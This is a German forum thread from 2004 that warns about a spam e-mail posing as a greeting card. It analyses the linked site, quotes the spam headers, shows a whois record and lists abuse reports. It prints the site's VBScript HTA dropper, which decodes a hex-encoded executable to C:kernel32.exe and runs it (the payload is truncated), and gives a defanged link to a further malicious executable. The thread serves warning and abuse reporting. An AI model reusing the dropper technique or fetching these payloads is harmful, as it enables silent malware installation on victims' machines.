[UBE/Dialer/Hacking] You have received Greeting E-Card!
VORSICHT: Der unten beschriebene Link versucht mittels des Windows-Scripting-Host vermutlich etwas Böses zu installieren!
Betreten der Website auf eigene Gefahr!
Dazu wird in index3.html die php-Datei index3.php in ein Objekt eingebunden; dieses erzeugt dann eine HTA (HTML-Application) mit folgendem Inhalt:
Code:
<SCRIPT language=vbs>
self.MoveTo 6000,6000
set a=CreateObject("Scripting.FileSystemObject")
set b=a.CreateTextFile("C:kernel32.exe",1)
b.Write(H("4D5A90
....viele viele weitere Zeichen......
02A"))
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:kernel32.exe")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
</SCRIPT>
Das sieht nicht gut aus; was es genau ist vermag ich nicht zu sagen, ich tippe mal auf Dialer.
whois neofazis.biz:
Code:
Domain Name: NEOFAZIS.BIZ
Domain ID: D7802215-BIZ
Sponsoring Registrar: ENOM, INC.
Domain Status: ok
Registrant ID: B0CCEAE9B1214D87
Registrant Name: Alex Sidorovsky
Registrant Organization: PEKOS
Registrant Address1: Komunisticheskaya 18-167
Registrant City: Moscow
Registrant State/Province: RU
Registrant Postal Code: 839235
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.9202537888
Registrant Email:
[Link nur für registrierte Mitglieder sichtbar. ]
Re: 69.70.101.189 (Ursprungsquelle der Spammail)
To: abuse#videotron.ca
Re: neofazis.biz [69.46.10.93] (beworbene Seite)
To: abuse#hivelocity.net
===8<==============Original message text===============
Received: from modemcable189.101-70-69.mc.videotron.ca (modemcable189.101-70-69.mc.videotron.ca [69.70.101.189])
by mailgate2.xxxyyyzzz.de (MOS 3.4.6-GR)
with SMTP id BBG10289;
Wed, 29 Sep 2004 02:35:47 +0200 (CEST)
From: "
[Link nur für registrierte Mitglieder sichtbar. ]" <
[Link nur für registrierte Mitglieder sichtbar. ]>
To: "someone.else" <
[Link nur für registrierte Mitglieder sichtbar. ].invalid>
Subject: You have received Greeting E-Card!
Date: Wen, 29 Aug 2004 00:26:33 +0000
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
Message-ID: <000e01c4a5ba$0d8f78ee$bd654645@modemcable189>
X-Mailer: Microsoft Outlook Express 5.50.4922.1500
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4922.1500
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Junkmail: UCE(198)
X-Junkmail-Status: score=198/50, host=mailgate2.xxxyyyzzz.de
A `Send a Greeting` card has been sent to you!
To retrieve this card, please go to this URL:
h t t p : / / neofazis . biz/index3.html
(note: your card will be kept on-line for 2 weeks.)
===8<===========End of original message text===========
RE:[UBE/Dialer/Hacking] You have received Greeting E-Card!
Ich hasse solche Spammer, die ihren Mist als E-Card tarnen...
Die bringen irgendwann noch die ganzen seriösen E-Card Anbieter in Verruf...
-------------------------------------------------
Newsletter gehackt?
- In einem Atomkraftwerk kann man auch nicht sagen, man habe keine rote Warnlampe leuchten sehen und keine Alarm-Sirenen gehört...
RE:[UBE/Dialer/Hacking] You have received Greeting E-Card!
Wenn man IE als UserAgent einstellt, landet man inzwischen bei h t t p:// www. neofazis.biz/index2.htm, vonwoaus eine böseböse Exedatei runtergeladen wird:
h t t p:// www. neofazis.biz/cht.exe
ich kann sie hier grad leider nicht testen ....
Lesezeichen